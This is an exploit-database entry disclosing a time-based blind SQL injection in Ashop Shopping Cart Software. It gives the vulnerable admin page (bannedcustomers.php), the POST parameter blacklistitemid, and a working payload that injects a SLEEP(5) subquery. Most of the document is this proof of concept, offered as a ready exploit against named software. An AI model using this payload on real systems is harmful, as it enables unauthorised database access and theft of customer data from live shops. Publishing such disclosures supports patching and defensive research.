Ashop Shopping Cart Software - SQL Injection Vulnerability

2019-04-09T00:00:00
ID 1337DAY-ID-32516
Type zdt
Reporter Doğukan Karaciğer
Modified 2019-04-09T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Exploit Author: Doğukan Karaciğer
# Vendor Homepage: http://www.ashopsoftware.com
# Software Link: https://sourceforge.net/projects/ashop/
# Demo Site: http://demo.ashopsoftware.com/
# Version: Lastest
# Tested on: Ubuntu-trusty-64
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/admin/bannedcustomers.php
Parameter: blacklistitemid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: blacklistitem=1&deletebutton=Delete&blacklistitemid=1 AND (SELECT
* FROM (SELECT(SLEEP(5)))MGvE)

#  0day.today [2019-04-10]  #